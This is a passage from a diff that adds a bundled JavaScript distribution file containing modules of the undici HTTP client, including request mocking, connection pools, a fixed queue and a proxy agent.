this[kMockDispatch].persist = true + return this + } + + /** + * Allow one to define a reply for a set amount of matching requests. + */ + times (repeatTimes) { + if (typeof repeatTimes !== 'number' || !Number.isInteger(repeatTimes) || repeatTimes <= 0) { + throw new InvalidArgumentError('repeatTimes must be a valid integer > 0') + } + + this[kMockDispatch].times = repeatTimes + return this + } +} + +/** + * Defines an interceptor for a Mock + */ +class MockInterceptor { + constructor (opts, mockDispatches) { + if (typeof opts !== 'object') { + throw new InvalidArgumentError('opts must be an object') + } + if (typeof opts.path === 'undefined') { + throw new InvalidArgumentError('opts.path must be defined') + } + if (typeof opts.method === 'undefined') { + opts.method = 'GET' + } + // See https://github.com/nodejs/undici/issues/1245 + // As per RFC 3986, clients are not supposed to send URI + // fragments to servers when they retrieve a document, + if (typeof opts.path === 'string') { + if (opts.query) { + opts.path = buildURL(opts.path, opts.query) + } else { + // Matches https://github.com/nodejs/undici/blob/main/lib/fetch/index.js#L1811 + const parsedURL = new URL(opts.path, 'data://') + opts.path = parsedURL.pathname + parsedURL.search + } + } + if (typeof opts.method === 'string') { + opts.method = opts.method.toUpperCase() + } + + this[kDispatchKey] = buildKey(opts) + this[kDispatches] = mockDispatches + this[kDefaultHeaders] = {} + this[kDefaultTrailers] = {} + this[kContentLength] = false + } + + createMockScopeDispatchData (statusCode, data, responseOptions = {}) { + const responseData = getResponseData(data) + const contentLength = this[kContentLength] ? { 'content-length': responseData.length } : {} + const headers = { ...this[kDefaultHeaders], ...contentLength, ...responseOptions.headers } + const trailers = { ...this[kDefaultTrailers], ...responseOptions.trailers } + + return { statusCode, data, headers, trailers } + } + + validateReplyParameters (statusCode, data, responseOptions) { + if (typeof statusCode === 'undefined') { + throw new InvalidArgumentError('statusCode must be defined') + } + if (typeof data === 'undefined') { + throw new InvalidArgumentError('data must be defined') + } + if (typeof responseOptions !== 'object') { + throw new InvalidArgumentError('responseOptions must be an object') + } + } + + /** + * Mock an undici request with a defined reply. + */ + reply (replyData) { + // Values of reply aren't available right now as they + // can only be available when the reply callback is invoked. + if (typeof replyData === 'function') { + // We'll first wrap the provided callback in another function, + // this function will properly resolve the data from the callback + // when invoked. + const wrappedDefaultsCallback = (opts) => { + // Our reply options callback contains the parameter for statusCode, data and options. + const resolvedData = replyData(opts) + + // Check if it is in the right format + if (typeof resolvedData !== 'object') { + throw new InvalidArgumentError('reply options callback must return an object') + } + + const { statusCode, data = '', responseOptions = {} } = resolvedData + this.validateReplyParameters(statusCode, data, responseOptions) + // Since the values can be obtained immediately we return them + // from this higher order function that will be resolved later. + return { + ...this.createMockScopeDispatchData(statusCode, data, responseOptions) + } + } + + // Add usual dispatch data, but this time set the data parameter to function that will eventually provide data. + const newMockDispatch = addMockDispatch(this[kDispatches], this[kDispatchKey], wrappedDefaultsCallback) + return new MockScope(newMockDispatch) + } + + // We can have either one or three parameters, if we get here, + // we should have 1-3 parameters. So we spread the arguments of + // this function to obtain the parameters, since replyData will always + // just be the statusCode. + const [statusCode, data = '', responseOptions = {}] = [...arguments] + this.validateReplyParameters(statusCode, data, responseOptions) + + // Send in-already provided data like usual + const dispatchData = this.createMockScopeDispatchData(statusCode, data, responseOptions) + const newMockDispatch = addMockDispatch(this[kDispatches], this[kDispatchKey], dispatchData) + return new MockScope(newMockDispatch) + } + + /** + * Mock an undici request with a defined error. + */ + replyWithError (error) { + if (typeof error === 'undefined') { + throw new InvalidArgumentError('error must be defined') + } + + const newMockDispatch = addMockDispatch(this[kDispatches], this[kDispatchKey], { error }) + return new MockScope(newMockDispatch) + } + + /** + * Set default reply headers on the interceptor for subsequent replies + */ + defaultReplyHeaders (headers) { + if (typeof headers === 'undefined') { + throw new InvalidArgumentError('headers must be defined') + } + + this[kDefaultHeaders] = headers + return this + } + + /** + * Set default reply trailers on the interceptor for subsequent replies + */ + defaultReplyTrailers (trailers) { + if (typeof trailers === 'undefined') { + throw new InvalidArgumentError('trailers must be defined') + } + + this[kDefaultTrailers] = trailers + return this + } + + /** + * Set reply content length header for replies on the interceptor + */ + replyContentLength () { + this[kContentLength] = true + return this + } +} + +module.exports.MockInterceptor = MockInterceptor +module.exports.MockScope = MockScope + + +/***/ }), + +/***/ 6193: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const { promisify } = __nccwpck_require__(3837) +const Pool = __nccwpck_require__(4634) +const { buildMockDispatch } = __nccwpck_require__(9323) +const { + kDispatches, + kMockAgent, + kClose, + kOriginalClose, + kOrigin, + kOriginalDispatch, + kConnected +} = __nccwpck_require__(4347) +const { MockInterceptor } = __nccwpck_require__(410) +const Symbols = __nccwpck_require__(2785) +const { InvalidArgumentError } = __nccwpck_require__(8045) + +/** + * MockPool provides an API that extends the Pool to influence the mockDispatches. + */ +class MockPool extends Pool { + constructor (origin, opts) { + super(origin, opts) + + if (!opts || !opts.agent || typeof opts.agent.dispatch !== 'function') { + throw new InvalidArgumentError('Argument opts.agent must implement Agent') + } + + this[kMockAgent] = opts.agent + this[kOrigin] = origin + this[kDispatches] = [] + this[kConnected] = 1 + this[kOriginalDispatch] = this.dispatch + this[kOriginalClose] = this.close.bind(this) + + this.dispatch = buildMockDispatch.call(this) + this.close = this[kClose] + } + + get [Symbols.kConnected] () { + return this[kConnected] + } + + /** + * Sets up the base interceptor for mocking replies from undici. + */ + intercept (opts) { + return new MockInterceptor(opts, this[kDispatches]) + } + + async [kClose] () { + await promisify(this[kOriginalClose])() + this[kConnected] = 0 + this[kMockAgent][Symbols.kClients].delete(this[kOrigin]) + } +} + +module.exports = MockPool + + +/***/ }), + +/***/ 4347: +/***/ ((module) => { + +"use strict"; + + +module.exports = { + kAgent: Symbol('agent'), + kOptions: Symbol('options'), + kFactory: Symbol('factory'), + kDispatches: Symbol('dispatches'), + kDispatchKey: Symbol('dispatch key'), + kDefaultHeaders: Symbol('default headers'), + kDefaultTrailers: Symbol('default trailers'), + kContentLength: Symbol('content length'), + kMockAgent: Symbol('mock agent'), + kMockAgentSet: Symbol('mock agent set'), + kMockAgentGet: Symbol('mock agent get'), + kMockDispatch: Symbol('mock dispatch'), + kClose: Symbol('close'), + kOriginalClose: Symbol('original agent close'), + kOrigin: Symbol('origin'), + kIsMockActive: Symbol('is mock active'), + kNetConnect: Symbol('net connect'), + kGetNetConnect: Symbol('get net connect'), + kConnected: Symbol('connected') +} + + +/***/ }), + +/***/ 9323: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const { MockNotMatchedError } = __nccwpck_require__(888) +const { + kDispatches, + kMockAgent, + kOriginalDispatch, + kOrigin, + kGetNetConnect +} = __nccwpck_require__(4347) +const { buildURL, nop } = __nccwpck_require__(3983) +const { STATUS_CODES } = __nccwpck_require__(3685) +const { + types: { + isPromise + } +} = __nccwpck_require__(3837) + +function matchValue (match, value) { + if (typeof match === 'string') { + return match === value + } + if (match instanceof RegExp) { + return match.test(value) + } + if (typeof match === 'function') { + return match(value) === true + } + return false +} + +function lowerCaseEntries (headers) { + return Object.fromEntries( + Object.entries(headers).map(([headerName, headerValue]) => { + return [headerName.toLocaleLowerCase(), headerValue] + }) + ) +} + +/** + * @param {import('../../index').Headers|string[]|Record} headers + * @param {string} key + */ +function getHeaderByName (headers, key) { + if (Array.isArray(headers)) { + for (let i = 0; i < headers.length; i += 2) { + if (headers[i].toLocaleLowerCase() === key.toLocaleLowerCase()) { + return headers[i + 1] + } + } + + return undefined + } else if (typeof headers.get === 'function') { + return headers.get(key) + } else { + return lowerCaseEntries(headers)[key.toLocaleLowerCase()] + } +} + +/** @param {string[]} headers */ +function buildHeadersFromArray (headers) { // fetch HeadersList + const clone = headers.slice() + const entries = [] + for (let index = 0; index < clone.length; index += 2) { + entries.push([clone[index], clone[index + 1]]) + } + return Object.fromEntries(entries) +} + +function matchHeaders (mockDispatch, headers) { + if (typeof mockDispatch.headers === 'function') { + if (Array.isArray(headers)) { // fetch HeadersList + headers = buildHeadersFromArray(headers) + } + return mockDispatch.headers(headers ? lowerCaseEntries(headers) : {}) + } + if (typeof mockDispatch.headers === 'undefined') { + return true + } + if (typeof headers !== 'object' || typeof mockDispatch.headers !== 'object') { + return false + } + + for (const [matchHeaderName, matchHeaderValue] of Object.entries(mockDispatch.headers)) { + const headerValue = getHeaderByName(headers, matchHeaderName) + + if (!matchValue(matchHeaderValue, headerValue)) { + return false + } + } + return true +} + +function safeUrl (path) { + if (typeof path !== 'string') { + return path + } + + const pathSegments = path.split('?') + + if (pathSegments.length !== 2) { + return path + } + + const qp = new URLSearchParams(pathSegments.pop()) + qp.sort() + return [...pathSegments, qp.toString()].join('?') +} + +function matchKey (mockDispatch, { path, method, body, headers }) { + const pathMatch = matchValue(mockDispatch.path, path) + const methodMatch = matchValue(mockDispatch.method, method) + const bodyMatch = typeof mockDispatch.body !== 'undefined' ? matchValue(mockDispatch.body, body) : true + const headersMatch = matchHeaders(mockDispatch, headers) + return pathMatch && methodMatch && bodyMatch && headersMatch +} + +function getResponseData (data) { + if (Buffer.isBuffer(data)) { + return data + } else if (typeof data === 'object') { + return JSON.stringify(data) + } else { + return data.toString() + } +} + +function getMockDispatch (mockDispatches, key) { + const basePath = key.query ? buildURL(key.path, key.query) : key.path + const resolvedPath = typeof basePath === 'string' ? safeUrl(basePath) : basePath + + // Match path + let matchedMockDispatches = mockDispatches.filter(({ consumed }) => !consumed).filter(({ path }) => matchValue(safeUrl(path), resolvedPath)) + if (matchedMockDispatches.length === 0) { + throw new MockNotMatchedError(`Mock dispatch not matched for path '${resolvedPath}'`) + } + + // Match method + matchedMockDispatches = matchedMockDispatches.filter(({ method }) => matchValue(method, key.method)) + if (matchedMockDispatches.length === 0) { + throw new MockNotMatchedError(`Mock dispatch not matched for method '${key.method}'`) + } + + // Match body + matchedMockDispatches = matchedMockDispatches.filter(({ body }) => typeof body !== 'undefined' ? matchValue(body, key.body) : true) + if (matchedMockDispatches.length === 0) { + throw new MockNotMatchedError(`Mock dispatch not matched for body '${key.body}'`) + } + + // Match headers + matchedMockDispatches = matchedMockDispatches.filter((mockDispatch) => matchHeaders(mockDispatch, key.headers)) + if (matchedMockDispatches.length === 0) { + throw new MockNotMatchedError(`Mock dispatch not matched for headers '${typeof key.headers === 'object' ? JSON.stringify(key.headers) : key.headers}'`) + } + + return matchedMockDispatches[0] +} + +function addMockDispatch (mockDispatches, key, data) { + const baseData = { timesInvoked: 0, times: 1, persist: false, consumed: false } + const replyData = typeof data === 'function' ? { callback: data } : { ...data } + const newMockDispatch = { ...baseData, ...key, pending: true, data: { error: null, ...replyData } } + mockDispatches.push(newMockDispatch) + return newMockDispatch +} + +function deleteMockDispatch (mockDispatches, key) { + const index = mockDispatches.findIndex(dispatch => { + if (!dispatch.consumed) { + return false + } + return matchKey(dispatch, key) + }) + if (index !== -1) { + mockDispatches.splice(index, 1) + } +} + +function buildKey (opts) { + const { path, method, body, headers, query } = opts + return { + path, + method, + body, + headers, + query + } +} + +function generateKeyValues (data) { + return Object.entries(data).reduce((keyValuePairs, [key, value]) => [ + ...keyValuePairs, + Buffer.from(`${key}`), + Array.isArray(value) ? value.map(x => Buffer.from(`${x}`)) : Buffer.from(`${value}`) + ], []) +} + +/** + * @see https://developer.mozilla.org/en-US/docs/Web/HTTP/Status + * @param {number} statusCode + */ +function getStatusText (statusCode) { + return STATUS_CODES[statusCode] || 'unknown' +} + +async function getResponse (body) { + const buffers = [] + for await (const data of body) { + buffers.push(data) + } + return Buffer.concat(buffers).toString('utf8') +} + +/** + * Mock dispatch function used to simulate undici dispatches + */ +function mockDispatch (opts, handler) { + // Get mock dispatch from built key + const key = buildKey(opts) + const mockDispatch = getMockDispatch(this[kDispatches], key) + + mockDispatch.timesInvoked++ + + // Here's where we resolve a callback if a callback is present for the dispatch data. + if (mockDispatch.data.callback) { + mockDispatch.data = { ...mockDispatch.data, ...mockDispatch.data.callback(opts) } + } + + // Parse mockDispatch data + const { data: { statusCode, data, headers, trailers, error }, delay, persist } = mockDispatch + const { timesInvoked, times } = mockDispatch + + // If it's used up and not persistent, mark as consumed + mockDispatch.consumed = !persist && timesInvoked >= times + mockDispatch.pending = timesInvoked < times + + // If specified, trigger dispatch error + if (error !== null) { + deleteMockDispatch(this[kDispatches], key) + handler.onError(error) + return true + } + + // Handle the request with a delay if necessary + if (typeof delay === 'number' && delay > 0) { + setTimeout(() => { + handleReply(this[kDispatches]) + }, delay) + } else { + handleReply(this[kDispatches]) + } + + function handleReply (mockDispatches, _data = data) { + // fetch's HeadersList is a 1D string array + const optsHeaders = Array.isArray(opts.headers) + ? buildHeadersFromArray(opts.headers) + : opts.headers + const body = typeof _data === 'function' + ? _data({ ...opts, headers: optsHeaders }) + : _data + + // util.types.isPromise is likely needed for jest. + if (isPromise(body)) { + // If handleReply is asynchronous, throwing an error + // in the callback will reject the promise, rather than + // synchronously throw the error, which breaks some tests. + // Rather, we wait for the callback to resolve if it is a + // promise, and then re-run handleReply with the new body. + body.then((newData) => handleReply(mockDispatches, newData)) + return + } + + const responseData = getResponseData(body) + const responseHeaders = generateKeyValues(headers) + const responseTrailers = generateKeyValues(trailers) + + handler.abort = nop + handler.onHeaders(statusCode, responseHeaders, resume, getStatusText(statusCode)) + handler.onData(Buffer.from(responseData)) + handler.onComplete(responseTrailers) + deleteMockDispatch(mockDispatches, key) + } + + function resume () {} + + return true +} + +function buildMockDispatch () { + const agent = this[kMockAgent] + const origin = this[kOrigin] + const originalDispatch = this[kOriginalDispatch] + + return function dispatch (opts, handler) { + if (agent.isMockActive) { + try { + mockDispatch.call(this, opts, handler) + } catch (error) { + if (error instanceof MockNotMatchedError) { + const netConnect = agent[kGetNetConnect]() + if (netConnect === false) { + throw new MockNotMatchedError(`${error.message}: subsequent request to origin ${origin} was not allowed (net.connect disabled)`) + } + if (checkNetConnect(netConnect, origin)) { + originalDispatch.call(this, opts, handler) + } else { + throw new MockNotMatchedError(`${error.message}: subsequent request to origin ${origin} was not allowed (net.connect is not enabled for this origin)`) + } + } else { + throw error + } + } + } else { + originalDispatch.call(this, opts, handler) + } + } +} + +function checkNetConnect (netConnect, origin) { + const url = new URL(origin) + if (netConnect === true) { + return true + } else if (Array.isArray(netConnect) && netConnect.some((matcher) => matchValue(matcher, url.host))) { + return true + } + return false +} + +function buildMockOptions (opts) { + if (opts) { + const { agent, ...mockOptions } = opts + return mockOptions + } +} + +module.exports = { + getResponseData, + getMockDispatch, + addMockDispatch, + deleteMockDispatch, + buildKey, + generateKeyValues, + matchValue, + getResponse, + getStatusText, + mockDispatch, + buildMockDispatch, + checkNetConnect, + buildMockOptions, + getHeaderByName +} + + +/***/ }), + +/***/ 6823: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const { Transform } = __nccwpck_require__(2781) +const { Console } = __nccwpck_require__(6206) + +/** + * Gets the output of `console.table(…)` as a string. + */ +module.exports = class PendingInterceptorsFormatter { + constructor ({ disableColors } = {}) { + this.transform = new Transform({ + transform (chunk, _enc, cb) { + cb(null, chunk) + } + }) + + this.logger = new Console({ + stdout: this.transform, + inspectOptions: { + colors: !disableColors && !process.env.CI + } + }) + } + + format (pendingInterceptors) { + const withPrettyHeaders = pendingInterceptors.map( + ({ method, path, data: { statusCode }, persist, times, timesInvoked, origin }) => ({ + Method: method, + Origin: origin, + Path: path, + 'Status code': statusCode, + Persistent: persist ? '✅' : 'âŒ', + Invocations: timesInvoked, + Remaining: persist ? Infinity : times - timesInvoked + })) + + this.logger.table(withPrettyHeaders) + return this.transform.read().toString() + } +} + + +/***/ }), + +/***/ 8891: +/***/ ((module) => { + +"use strict"; + + +const singulars = { + pronoun: 'it', + is: 'is', + was: 'was', + this: 'this' +} + +const plurals = { + pronoun: 'they', + is: 'are', + was: 'were', + this: 'these' +} + +module.exports = class Pluralizer { + constructor (singular, plural) { + this.singular = singular + this.plural = plural + } + + pluralize (count) { + const one = count === 1 + const keys = one ? singulars : plurals + const noun = one ? this.singular : this.plural + return { ...keys, count, noun } + } +} + + +/***/ }), + +/***/ 8266: +/***/ ((module) => { + +"use strict"; +/* eslint-disable */ + + + +// Extracted from node/lib/internal/fixed_queue.js + +// Currently optimal queue size, tested on V8 6.0 - 6.6. Must be power of two. +const kSize = 2048; +const kMask = kSize - 1; + +// The FixedQueue is implemented as a singly-linked list of fixed-size +// circular buffers. It looks something like this: +// +// head tail +// | | +// v v +// +-----------+ <-----\ +-----------+ <------\ +-----------+ +// | [null] | \----- | next | \------- | next | +// +-----------+ +-----------+ +-----------+ +// | item | <-- bottom | item | <-- bottom | [empty] | +// | item | | item | | [empty] | +// | item | | item | | [empty] | +// | item | | item | | [empty] | +// | item | | item | bottom --> | item | +// | item | | item | | item | +// | ... | | ... | | ... | +// | item | | item | | item | +// | item | | item | | item | +// | [empty] | <-- top | item | | item | +// | [empty] | | item | | item | +// | [empty] | | [empty] | <-- top top --> | [empty] | +// +-----------+ +-----------+ +-----------+ +// +// Or, if there is only one circular buffer, it looks something +// like either of these: +// +// head tail head tail +// | | | | +// v v v v +// +-----------+ +-----------+ +// | [null] | | [null] | +// +-----------+ +-----------+ +// | [empty] | | item | +// | [empty] | | item | +// | item | <-- bottom top --> | [empty] | +// | item | | [empty] | +// | [empty] | <-- top bottom --> | item | +// | [empty] | | item | +// +-----------+ +-----------+ +// +// Adding a value means moving `top` forward by one, removing means +// moving `bottom` forward by one. After reaching the end, the queue +// wraps around. +// +// When `top === bottom` the current queue is empty and when +// `top + 1 === bottom` it's full. This wastes a single space of storage +// but allows much quicker checks. + +class FixedCircularBuffer { + constructor() { + this.bottom = 0; + this.top = 0; + this.list = new Array(kSize); + this.next = null; + } + + isEmpty() { + return this.top === this.bottom; + } + + isFull() { + return ((this.top + 1) & kMask) === this.bottom; + } + + push(data) { + this.list[this.top] = data; + this.top = (this.top + 1) & kMask; + } + + shift() { + const nextItem = this.list[this.bottom]; + if (nextItem === undefined) + return null; + this.list[this.bottom] = undefined; + this.bottom = (this.bottom + 1) & kMask; + return nextItem; + } +} + +module.exports = class FixedQueue { + constructor() { + this.head = this.tail = new FixedCircularBuffer(); + } + + isEmpty() { + return this.head.isEmpty(); + } + + push(data) { + if (this.head.isFull()) { + // Head is full: Creates a new queue, sets the old queue's `.next` to it, + // and sets it as the new main queue. + this.head = this.head.next = new FixedCircularBuffer(); + } + this.head.push(data); + } + + shift() { + const tail = this.tail; + const next = tail.shift(); + if (tail.isEmpty() && tail.next !== null) { + // If there is another queue, it forms the new tail. + this.tail = tail.next; + } + return next; + } +}; + + +/***/ }), + +/***/ 3198: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const DispatcherBase = __nccwpck_require__(4839) +const FixedQueue = __nccwpck_require__(8266) +const { kConnected, kSize, kRunning, kPending, kQueued, kBusy, kFree, kUrl, kClose, kDestroy, kDispatch } = __nccwpck_require__(2785) +const PoolStats = __nccwpck_require__(9689) + +const kClients = Symbol('clients') +const kNeedDrain = Symbol('needDrain') +const kQueue = Symbol('queue') +const kClosedResolve = Symbol('closed resolve') +const kOnDrain = Symbol('onDrain') +const kOnConnect = Symbol('onConnect') +const kOnDisconnect = Symbol('onDisconnect') +const kOnConnectionError = Symbol('onConnectionError') +const kGetDispatcher = Symbol('get dispatcher') +const kAddClient = Symbol('add client') +const kRemoveClient = Symbol('remove client') +const kStats = Symbol('stats') + +class PoolBase extends DispatcherBase { + constructor () { + super() + + this[kQueue] = new FixedQueue() + this[kClients] = [] + this[kQueued] = 0 + + const pool = this + + this[kOnDrain] = function onDrain (origin, targets) { + const queue = pool[kQueue] + + let needDrain = false + + while (!needDrain) { + const item = queue.shift() + if (!item) { + break + } + pool[kQueued]-- + needDrain = !this.dispatch(item.opts, item.handler) + } + + this[kNeedDrain] = needDrain + + if (!this[kNeedDrain] && pool[kNeedDrain]) { + pool[kNeedDrain] = false + pool.emit('drain', origin, [pool, ...targets]) + } + + if (pool[kClosedResolve] && queue.isEmpty()) { + Promise + .all(pool[kClients].map(c => c.close())) + .then(pool[kClosedResolve]) + } + } + + this[kOnConnect] = (origin, targets) => { + pool.emit('connect', origin, [pool, ...targets]) + } + + this[kOnDisconnect] = (origin, targets, err) => { + pool.emit('disconnect', origin, [pool, ...targets], err) + } + + this[kOnConnectionError] = (origin, targets, err) => { + pool.emit('connectionError', origin, [pool, ...targets], err) + } + + this[kStats] = new PoolStats(this) + } + + get [kBusy] () { + return this[kNeedDrain] + } + + get [kConnected] () { + return this[kClients].filter(client => client[kConnected]).length + } + + get [kFree] () { + return this[kClients].filter(client => client[kConnected] && !client[kNeedDrain]).length + } + + get [kPending] () { + let ret = this[kQueued] + for (const { [kPending]: pending } of this[kClients]) { + ret += pending + } + return ret + } + + get [kRunning] () { + let ret = 0 + for (const { [kRunning]: running } of this[kClients]) { + ret += running + } + return ret + } + + get [kSize] () { + let ret = this[kQueued] + for (const { [kSize]: size } of this[kClients]) { + ret += size + } + return ret + } + + get stats () { + return this[kStats] + } + + async [kClose] () { + if (this[kQueue].isEmpty()) { + return Promise.all(this[kClients].map(c => c.close())) + } else { + return new Promise((resolve) => { + this[kClosedResolve] = resolve + }) + } + } + + async [kDestroy] (err) { + while (true) { + const item = this[kQueue].shift() + if (!item) { + break + } + item.handler.onError(err) + } + + return Promise.all(this[kClients].map(c => c.destroy(err))) + } + + [kDispatch] (opts, handler) { + const dispatcher = this[kGetDispatcher]() + + if (!dispatcher) { + this[kNeedDrain] = true + this[kQueue].push({ opts, handler }) + this[kQueued]++ + } else if (!dispatcher.dispatch(opts, handler)) { + dispatcher[kNeedDrain] = true + this[kNeedDrain] = !this[kGetDispatcher]() + } + + return !this[kNeedDrain] + } + + [kAddClient] (client) { + client + .on('drain', this[kOnDrain]) + .on('connect', this[kOnConnect]) + .on('disconnect', this[kOnDisconnect]) + .on('connectionError', this[kOnConnectionError]) + + this[kClients].push(client) + + if (this[kNeedDrain]) { + process.nextTick(() => { + if (this[kNeedDrain]) { + this[kOnDrain](client[kUrl], [this, client]) + } + }) + } + + return this + } + + [kRemoveClient] (client) { + client.close(() => { + const idx = this[kClients].indexOf(client) + if (idx !== -1) { + this[kClients].splice(idx, 1) + } + }) + + this[kNeedDrain] = this[kClients].some(dispatcher => ( + !dispatcher[kNeedDrain] && + dispatcher.closed !== true && + dispatcher.destroyed !== true + )) + } +} + +module.exports = { + PoolBase, + kClients, + kNeedDrain, + kAddClient, + kRemoveClient, + kGetDispatcher +} + + +/***/ }), + +/***/ 9689: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +const { kFree, kConnected, kPending, kQueued, kRunning, kSize } = __nccwpck_require__(2785) +const kPool = Symbol('pool') + +class PoolStats { + constructor (pool) { + this[kPool] = pool + } + + get connected () { + return this[kPool][kConnected] + } + + get free () { + return this[kPool][kFree] + } + + get pending () { + return this[kPool][kPending] + } + + get queued () { + return this[kPool][kQueued] + } + + get running () { + return this[kPool][kRunning] + } + + get size () { + return this[kPool][kSize] + } +} + +module.exports = PoolStats + + +/***/ }), + +/***/ 4634: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const { + PoolBase, + kClients, + kNeedDrain, + kAddClient, + kGetDispatcher +} = __nccwpck_require__(3198) +const Client = __nccwpck_require__(3598) +const { + InvalidArgumentError +} = __nccwpck_require__(8045) +const util = __nccwpck_require__(3983) +const { kUrl, kInterceptors } = __nccwpck_require__(2785) +const buildConnector = __nccwpck_require__(2067) + +const kOptions = Symbol('options') +const kConnections = Symbol('connections') +const kFactory = Symbol('factory') + +function defaultFactory (origin, opts) { + return new Client(origin, opts) +} + +class Pool extends PoolBase { + constructor (origin, { + connections, + factory = defaultFactory, + connect, + connectTimeout, + tls, + maxCachedSessions, + socketPath, + autoSelectFamily, + autoSelectFamilyAttemptTimeout, + allowH2, + ...options + } = {}) { + super() + + if (connections != null && (!Number.isFinite(connections) || connections < 0)) { + throw new InvalidArgumentError('invalid connections') + } + + if (typeof factory !== 'function') { + throw new InvalidArgumentError('factory must be a function.') + } + + if (connect != null && typeof connect !== 'function' && typeof connect !== 'object') { + throw new InvalidArgumentError('connect must be a function or an object') + } + + if (typeof connect !== 'function') { + connect = buildConnector({ + ...tls, + maxCachedSessions, + allowH2, + socketPath, + timeout: connectTimeout, + ...(util.nodeHasAutoSelectFamily && autoSelectFamily ? { autoSelectFamily, autoSelectFamilyAttemptTimeout } : undefined), + ...connect + }) + } + + this[kInterceptors] = options.interceptors && options.interceptors.Pool && Array.isArray(options.interceptors.Pool) + ? options.interceptors.Pool + : [] + this[kConnections] = connections || null + this[kUrl] = util.parseOrigin(origin) + this[kOptions] = { ...util.deepClone(options), connect, allowH2 } + this[kOptions].interceptors = options.interceptors + ? { ...options.interceptors } + : undefined + this[kFactory] = factory + } + + [kGetDispatcher] () { + let dispatcher = this[kClients].find(dispatcher => !dispatcher[kNeedDrain]) + + if (dispatcher) { + return dispatcher + } + + if (!this[kConnections] || this[kClients].length < this[kConnections]) { + dispatcher = this[kFactory](this[kUrl], this[kOptions]) + this[kAddClient](dispatcher) + } + + return dispatcher + } +} + +module.exports = Pool + + +/***/ }), + +/***/ 7858: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const { kProxy, kClose, kDestroy, kInterceptors } = __nccwpck_require__(2785) +const { URL } = __nccwpck_require__(7310) +const Agent = __nccwpck_require__(7890) +const Pool = __nccwpck_require__(4634) +const DispatcherBase = __nccwpck_require__(4839) +const { InvalidArgumentError, RequestAbortedError } = __nccwpck_require__(8045) +const buildConnector = __nccwpck_require__(2067) + +const kAgent = Symbol('proxy agent') +const kClient = Symbol('proxy client') +const kProxyHeaders = Symbol('proxy headers') +const kRequestTls = Symbol('request tls settings') +const kProxyTls = Symbol('proxy tls settings') +const kConnectEndpoint = Symbol('connect endpoint function') + +function defaultProtocolPort (protocol) { + return protocol === 'https:' ? 443 : 80 +} + +function buildProxyOptions (opts) { + if (typeof opts === 'string') { + opts = { uri: opts } + } + + if (!opts || !opts.uri) { + throw new InvalidArgumentError('Proxy opts.uri is mandatory') + } + + return { + uri: opts.uri, + protocol: opts.protocol || 'https' + } +} + +function defaultFactory (origin, opts) { + return new Pool(origin, opts) +} + +class ProxyAgent extends DispatcherBase { + constructor (opts) { + super(opts) + this[kProxy] = buildProxyOptions(opts) + this[kAgent] = new Agent(opts) + this[kInterceptors] = opts.interceptors && opts.interceptors.ProxyAgent && Array.isArray(opts.interceptors.ProxyAgent) + ? opts.interceptors.ProxyAgent + : [] + + if (typeof opts === 'string') { + opts = { uri: opts } + } + + if (!opts || !opts.uri) { + throw new InvalidArgumentError('Proxy opts.uri is mandatory') + } + + const { clientFactory = defaultFactory } = opts + + if (typeof clientFactory !== 'function') { + throw new InvalidArgumentError('Proxy opts.clientFactory must be a function.') + } + + this[kRequestTls] = opts.requestTls + this[kProxyTls] = opts.proxyTls + this[kProxyHeaders] = opts.headers || {} + + const resolvedUrl = new URL(opts.uri) + const { origin, port, host, username, password } = resolvedUrl + + if (opts.auth && opts.token) { + throw new InvalidArgumentError('opts.auth cannot be used in combination with opts.token') + } else if (opts.auth) { + /* @deprecated in favour of opts.token */ + this[kProxyHeaders]['proxy-authorization'] = `Basic ${opts.auth}` + } else if (opts.token) { + this[kProxyHeaders]['proxy-authorization'] = opts.token + } else if (username && password) { + this[kProxyHeaders]['proxy-authorization'] = `Basic ${Buffer.from(`${decodeURIComponent(username)}:${decodeURIComponent(password)}`).toString('base64')}` + } + + const connect = buildConnector({ ...opts.proxyTls }) + this[kConnectEndpoint] = buildConnector({ ...opts.requestTls }) + this[kClient] = clientFactory(resolvedUrl, { connect }) + this[kAgent] = new Agent({ + ...opts, + connect: async (opts, callback) => { + let requestedHost = opts.host + if (!opts.port) { + requestedHost += `:${defaultProtocolPort(opts.protocol)}` + } + try { + const { socket, statusCode } = await this[kClient].connect({ + origin, + port, + path: requestedHost, + signal: opts.signal, + headers: { + ...this[kProxyHeaders], + host + } + }) + if (statusCode !== 200) { + socket.on('error', () => {}).destroy() + callback(new RequestAbortedError(`Proxy response (${statusCode}) !== 200 when HTTP Tunneling`)) + } + if (opts.protocol !== 'https:') { + callback(null, socket) + return + } + let servername + if (this[kRequestTls]) { + servername = this[kRequestTls].servername + } else { + servername = opts.servername + } + this[kConnectEndpoint]({ ...opts, servername, httpSocket: socket }, callback) + } catch (err) { + callback(err) + } + } + }) + } + + dispatch (opts, handler) { + const { host } = new URL(opts.origin) + const headers = buildHeaders(opts.headers) + throwIfProxyAuthIsSent(headers) + return this[kAgent].dispatch( + { + ...opts, + headers: { + ...headers, + host + } + }, + handler + ) + } + + async [kClose] () { + await this[kAgent].close() + await this[kClient].close() + } + + async [kDestroy] () { + await this[kAgent].destroy() + await this[kClient].destroy() + } +} + +/** + * @param {string[] | Record} headers + * @returns {Record} + */ +function buildHeaders (headers) { + // When using undici.fetch, the headers list is stored + // as an array. + if (Array.isArray(headers)) { + /** @type {Record} */ + const headersPair = {} + + for (let i = 0; i < headers.length; i += 2) { + headersPair[headers[i]] = headers[i + 1] + } + + return headersPair + } + + return headers +} + +/** + * @param {Record} headers + * + * Previous versions of ProxyAgent suggests the Proxy-Authorization in request headers + * Nevertheless, it was changed and to avoid a security vulnerability by end users + * this check was created. + * It should be removed in the next major version for performance reasons + */ +function throwIfProxyAuthIsSent (headers) { + const existProxyAuth = headers && Object.keys(headers) + .find((key) => key.toLowerCase() === 'proxy-authorization') + if (existProxyAuth) { + throw new InvalidArgumentError('Proxy-Authorization should be sent in ProxyAgent constructor') + } +} + +module.exports = ProxyAgent + + +/***/ }), + +/***/ 9459: +/***/ ((module) => { + +"use strict"; + + +let fastNow = Date.now() +let fastNowTimeout + +const fastTimers 